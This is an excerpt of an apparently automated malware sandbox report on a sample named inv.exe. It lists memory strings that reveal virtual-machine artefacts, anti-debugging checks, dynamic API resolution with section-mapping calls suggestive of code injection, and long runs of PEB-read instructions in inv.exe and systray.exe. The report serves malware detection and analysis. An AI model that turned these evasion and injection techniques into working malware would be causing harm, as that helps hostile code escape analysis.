Source: explorer.exe, 00000003.00000000.264974146.0000000008CC6000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.259290184.00000000059C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000003.00000000.264159036.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.264159036.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 00000003.00000002.1324843429.00000000048E0000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.264159036.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: explorer.exe, 00000003.00000000.263820453.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 00000003.00000000.263820453.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000003.00000000.260426292.00000000069DA000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD002
Source: explorer.exe, 00000003.00000000.259290184.00000000059C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000000.259290184.00000000059C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000003.00000000.259290184.00000000059C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Queries a list of all running processes

Source: C:\Users\user\Desktop\inv.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\inv.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\inv.exe

Code function: 2_2_00409A90 rdtsc

2_2_00409A90

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\inv.exe

Code function: 2_2_0040ACD0 LdrLoadDll,

2_2_0040ACD0

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\inv.exe

Code function: 0_2_00992183 IsDebuggerPresent,OutputDebugStringW,

0_2_00992183

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\inv.exe

Code function: 0_2_00971120 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetConsoleWindow,ShowWindow,LoadLibraryA,RpcMgmtEpEltInqBegin,NtCreateSection,NtMapViewOfSection,CloseHandle,CallWindowProcW,

0_2_00971120

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_009950BD mov eax, dword ptr fs:[00000030h]		0_2_009950BD
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_00971000 mov eax, dword ptr fs:[00000030h]		0_2_00971000
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_0097B073 mov eax, dword ptr fs:[00000030h]		0_2_0097B073
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_0099519E mov eax, dword ptr fs:[00000030h]		0_2_0099519E
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_0097B101 mov ecx, dword ptr fs:[00000030h]		0_2_0097B101
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_00995100 mov eax, dword ptr fs:[00000030h]		0_2_00995100
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_00995143 mov eax, dword ptr fs:[00000030h]		0_2_00995143
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_009952A8 mov eax, dword ptr fs:[00000030h]		0_2_009952A8
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_009952EC mov eax, dword ptr fs:[00000030h]		0_2_009952EC
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_00995264 mov eax, dword ptr fs:[00000030h]		0_2_00995264
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_0099531D mov eax, dword ptr fs:[00000030h]		0_2_0099531D
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_009950BD mov eax, dword ptr fs:[00000030h]		2_2_009950BD
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_00971000 mov eax, dword ptr fs:[00000030h]		2_2_00971000
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_0097B073 mov eax, dword ptr fs:[00000030h]		2_2_0097B073
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_0099519E mov eax, dword ptr fs:[00000030h]		2_2_0099519E
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_0097B101 mov ecx, dword ptr fs:[00000030h]		2_2_0097B101
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_00995100 mov eax, dword ptr fs:[00000030h]		2_2_00995100
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_00995143 mov eax, dword ptr fs:[00000030h]		2_2_00995143
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_009952A8 mov eax, dword ptr fs:[00000030h]		2_2_009952A8
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_009952EC mov eax, dword ptr fs:[00000030h]		2_2_009952EC
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_00995264 mov eax, dword ptr fs:[00000030h]		2_2_00995264
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_0099531D mov eax, dword ptr fs:[00000030h]		2_2_0099531D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0481849B mov eax, dword ptr fs:[00000030h]		5_2_0481849B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048D8CD6 mov eax, dword ptr fs:[00000030h]		5_2_048D8CD6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048C14FB mov eax, dword ptr fs:[00000030h]		5_2_048C14FB
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04886CF0 mov eax, dword ptr fs:[00000030h]		5_2_04886CF0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04886CF0 mov eax, dword ptr fs:[00000030h]		5_2_04886CF0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04886CF0 mov eax, dword ptr fs:[00000030h]		5_2_04886CF0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048D740D mov eax, dword ptr fs:[00000030h]		5_2_048D740D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048D740D mov eax, dword ptr fs:[00000030h]		5_2_048D740D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048D740D mov eax, dword ptr fs:[00000030h]		5_2_048D740D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04886C0A mov eax, dword ptr fs:[00000030h]		5_2_04886C0A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04886C0A mov eax, dword ptr fs:[00000030h]		5_2_04886C0A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04886C0A mov eax, dword ptr fs:[00000030h]		5_2_04886C0A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04886C0A mov eax, dword ptr fs:[00000030h]		5_2_04886C0A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]		5_2_048C1C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]		5_2_048C1C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]		5_2_048C1C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]		5_2_048C1C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]		5_2_048C1C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]		5_2_048C1C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]		5_2_048C1C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]		5_2_048C1C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]		5_2_048C1C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]		5_2_048C1C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]		5_2_048C1C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]		5_2_048C1C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]		5_2_048C1C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]		5_2_048C1C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0483BC2C mov eax, dword ptr fs:[00000030h]		5_2_0483BC2C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0483A44B mov eax, dword ptr fs:[00000030h]		5_2_0483A44B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0489C450 mov eax, dword ptr fs:[00000030h]		5_2_0489C450
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0489C450 mov eax, dword ptr fs:[00000030h]		5_2_0489C450
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0482746D mov eax, dword ptr fs:[00000030h]		5_2_0482746D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04832581 mov eax, dword ptr fs:[00000030h]		5_2_04832581
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04832581 mov eax, dword ptr fs:[00000030h]		5_2_04832581
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04832581 mov eax, dword ptr fs:[00000030h]		5_2_04832581
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04832581 mov eax, dword ptr fs:[00000030h]		5_2_04832581
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04802D8A mov eax, dword ptr fs:[00000030h]		5_2_04802D8A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04802D8A mov eax, dword ptr fs:[00000030h]		5_2_04802D8A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04802D8A mov eax, dword ptr fs:[00000030h]		5_2_04802D8A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04802D8A mov eax, dword ptr fs:[00000030h]		5_2_04802D8A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04802D8A mov eax, dword ptr fs:[00000030h]		5_2_04802D8A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0483FD9B mov eax, dword ptr fs:[00000030h]		5_2_0483FD9B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0483FD9B mov eax, dword ptr fs:[00000030h]		5_2_0483FD9B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048D05AC mov eax, dword ptr fs:[00000030h]		5_2_048D05AC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048D05AC mov eax, dword ptr fs:[00000030h]		5_2_048D05AC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048335A1 mov eax, dword ptr fs:[00000030h]		5_2_048335A1
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04831DB5 mov eax, dword ptr fs:[00000030h]		5_2_04831DB5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04831DB5 mov eax, dword ptr fs:[00000030h]		5_2_04831DB5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04831DB5 mov eax, dword ptr fs:[00000030h]		5_2_04831DB5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04886DC9 mov eax, dword ptr fs:[00000030h]		5_2_04886DC9
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04886DC9 mov eax, dword ptr fs:[00000030h]		5_2_04886DC9
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04886DC9 mov eax, dword ptr fs:[00000030h]		5_2_04886DC9
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04886DC9 mov ecx, dword ptr fs:[00000030h]		5_2_04886DC9
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04886DC9 mov eax, dword ptr fs:[00000030h]		5_2_04886DC9
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04886DC9 mov eax, dword ptr fs:[00000030h]		5_2_04886DC9
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0481D5E0 mov eax, dword ptr fs:[00000030h]		5_2_0481D5E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0481D5E0 mov eax, dword ptr fs:[00000030h]		5_2_0481D5E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048CFDE2 mov eax, dword ptr fs:[00000030h]		5_2_048CFDE2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048CFDE2 mov eax, dword ptr fs:[00000030h]		5_2_048CFDE2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048CFDE2 mov eax, dword ptr fs:[00000030h]		5_2_048CFDE2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048CFDE2 mov eax, dword ptr fs:[00000030h]		5_2_048CFDE2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048B8DF1 mov eax, dword ptr fs:[00000030h]		5_2_048B8DF1
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0480AD30 mov eax, dword ptr fs:[00000030h]		5_2_0480AD30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]		5_2_04813D34
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]		5_2_04813D34
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]		5_2_04813D34
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]		5_2_04813D34
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]		5_2_04813D34
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]		5_2_04813D34
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]		5_2_04813D34
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]		5_2_04813D34
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]		5_2_04813D34
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]		5_2_04813D34
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]		5_2_04813D34
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]		5_2_04813D34
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]		5_2_04813D34
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048CE539 mov eax, dword ptr fs:[00000030h]		5_2_048CE539
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04834D3B mov eax, dword ptr fs:[00000030h]		5_2_04834D3B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04834D3B mov eax, dword ptr fs:[00000030h]		5_2_04834D3B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04834D3B mov eax, dword ptr fs:[00000030h]		5_2_04834D3B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048D8D34 mov eax, dword ptr fs:[00000030h]		5_2_048D8D34
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0488A537 mov eax, dword ptr fs:[00000030h]		5_2_0488A537
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04843D43 mov eax, dword ptr fs:[00000030h]		5_2_04843D43
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04883540 mov eax, dword ptr fs:[00000030h]		5_2_04883540
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048B3D40 mov eax, dword ptr fs:[00000030h]		5_2_048B3D40
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04827D50 mov eax, dword ptr fs:[00000030h]		5_2_04827D50
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0482C577 mov eax, dword ptr fs:[00000030h]		5_2_0482C577
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0482C577 mov eax, dword ptr fs:[00000030h]		5_2_0482C577
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0489FE87 mov eax, dword ptr fs:[00000030h]		5_2_0489FE87
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048D0EA5 mov eax, dword ptr fs:[00000030h]		5_2_048D0EA5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048D0EA5 mov eax, dword ptr fs:[00000030h]		5_2_048D0EA5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048D0EA5 mov eax, dword ptr fs:[00000030h]		5_2_048D0EA5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048846A7 mov eax, dword ptr fs:[00000030h]		5_2_048846A7
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04848EC7 mov eax, dword ptr fs:[00000030h]		5_2_04848EC7
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048BFEC0 mov eax, dword ptr fs:[00000030h]		5_2_048BFEC0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048336CC mov eax, dword ptr fs:[00000030h]		5_2_048336CC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048D8ED6 mov eax, dword ptr fs:[00000030h]		5_2_048D8ED6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048316E0 mov ecx, dword ptr fs:[00000030h]		5_2_048316E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048176E2 mov eax, dword ptr fs:[00000030h]		5_2_048176E2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0480C600 mov eax, dword ptr fs:[00000030h]		5_2_0480C600
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0480C600 mov eax, dword ptr fs:[00000030h]		5_2_0480C600
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0480C600 mov eax, dword ptr fs:[00000030h]		5_2_0480C600
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04838E00 mov eax, dword ptr fs:[00000030h]		5_2_04838E00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048C1608 mov eax, dword ptr fs:[00000030h]		5_2_048C1608
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0483A61C mov eax, dword ptr fs:[00000030h]		5_2_0483A61C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0483A61C mov eax, dword ptr fs:[00000030h]		5_2_0483A61C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0480E620 mov eax, dword ptr fs:[00000030h]		5_2_0480E620
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048BFE3F mov eax, dword ptr fs:[00000030h]		5_2_048BFE3F
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04817E41 mov eax, dword ptr fs:[00000030h]		5_2_04817E41
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04817E41 mov eax, dword ptr fs:[00000030h]		5_2_04817E41
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04817E41 mov eax, dword ptr fs:[00000030h]		5_2_04817E41
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04817E41 mov eax, dword ptr fs:[00000030h]		5_2_04817E41
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04817E41 mov eax, dword ptr fs:[00000030h]		5_2_04817E41
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04817E41 mov eax, dword ptr fs:[00000030h]		5_2_04817E41
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048CAE44 mov eax, dword ptr fs:[00000030h]		5_2_048CAE44
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048CAE44 mov eax, dword ptr fs:[00000030h]		5_2_048CAE44
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0481766D mov eax, dword ptr fs:[00000030h]		5_2_0481766D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0482AE73 mov eax, dword ptr fs:[00000030h]		5_2_0482AE73
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0482AE73 mov eax, dword ptr fs:[00000030h]		5_2_0482AE73
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0482AE73 mov eax, dword ptr fs:[00000030h]		5_2_0482AE73
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0482AE73 mov eax, dword ptr fs:[00000030h]		5_2_0482AE73
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0482AE73 mov eax, dword ptr fs:[00000030h]		5_2_0482AE73
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04818794 mov eax, dword ptr fs:[00000030h]		5_2_04818794
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04887794 mov eax, dword ptr fs:[00000030h]		5_2_04887794
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04887794 mov eax, dword ptr fs:[00000030h]		5_2_04887794
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04887794 mov eax, dword ptr fs:[00000030h]		5_2_04887794
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048437F5 mov eax, dword ptr fs:[00000030h]		5_2_048437F5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048D070D mov eax, dword ptr fs:[00000030h]		5_2_048D070D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048D070D mov eax, dword ptr fs:[00000030h]		5_2_048D070D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0483A70E mov eax, dword ptr fs:[00000030h]		5_2_0483A70E
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0483A70E mov eax, dword ptr fs:[00000030h]		5_2_0483A70E
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0482F716 mov eax, dword ptr fs:[00000030h]		5_2_0482F716
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0489FF10 mov eax, dword ptr fs:[00000030h]		5_2_0489FF10
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0489FF10 mov eax, dword ptr fs:[00000030h]		5_2_0489FF10
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04804F2E mov eax, dword ptr fs:[00000030h]		5_2_04804F2E
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04804F2E mov eax, dword ptr fs:[00000030h]		5_2_04804F2E
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0483E730 mov eax, dword ptr fs:[00000030h]		5_2_0483E730
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0481EF40 mov eax, dword ptr fs:[00000030h]		5_2_0481EF40
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0481FF60 mov eax, dword ptr fs:[00000030h]		5_2_0481FF60
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048D8F6A mov eax, dword ptr fs:[00000030h]		5_2_048D8F6A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04809080 mov eax, dword ptr fs:[00000030h]		5_2_04809080
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04883884 mov eax, dword ptr fs:[00000030h]		5_2_04883884
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04883884 mov eax, dword ptr fs:[00000030h]		5_2_04883884
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048320A0 mov eax, dword ptr fs:[00000030h]		5_2_048320A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048320A0 mov eax, dword ptr fs:[00000030h]		5_2_048320A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048320A0 mov eax, dword ptr fs:[00000030h]		5_2_048320A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048320A0 mov eax, dword ptr fs:[00000030h]		5_2_048320A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048320A0 mov eax, dword ptr fs:[00000030h]		5_2_048320A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048320A0 mov eax, dword ptr fs:[00000030h]		5_2_048320A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048490AF mov eax, dword ptr fs:[00000030h]		5_2_048490AF
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0483F0BF mov ecx, dword ptr fs:[00000030h]		5_2_0483F0BF
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0483F0BF mov eax, dword ptr fs:[00000030h]		5_2_0483F0BF
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0483F0BF mov eax, dword ptr fs:[00000030h]		5_2_0483F0BF
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0489B8D0 mov eax, dword ptr fs:[00000030h]		5_2_0489B8D0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0489B8D0 mov ecx, dword ptr fs:[00000030h]		5_2_0489B8D0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0489B8D0 mov eax, dword ptr fs:[00000030h]		5_2_0489B8D0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0489B8D0 mov eax, dword ptr fs:[00000030h]		5_2_0489B8D0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0489B8D0 mov eax, dword ptr fs:[00000030h]		5_2_0489B8D0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0489B8D0 mov eax, dword ptr fs:[00000030h]		5_2_0489B8D0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048040E1 mov eax, dword ptr fs:[00000030h]		5_2_048040E1
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048040E1 mov eax, dword ptr fs:[00000030h]		5_2_048040E1
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048040E1 mov eax, dword ptr fs:[00000030h]		5_2_048040E1
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048058EC mov eax, dword ptr fs:[00000030h]		5_2_048058EC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048D4015 mov eax, dword ptr fs:[00000030h]		5_2_048D4015
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048D4015 mov eax, dword ptr fs:[00000030h]		5_2_048D4015
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04887016 mov eax, dword ptr fs:[00000030h]		5_2_04887016
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04887016 mov eax, dword ptr fs:[00000030h]		5_2_04887016
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04887016 mov eax, dword ptr fs:[00000030h]		5_2_04887016
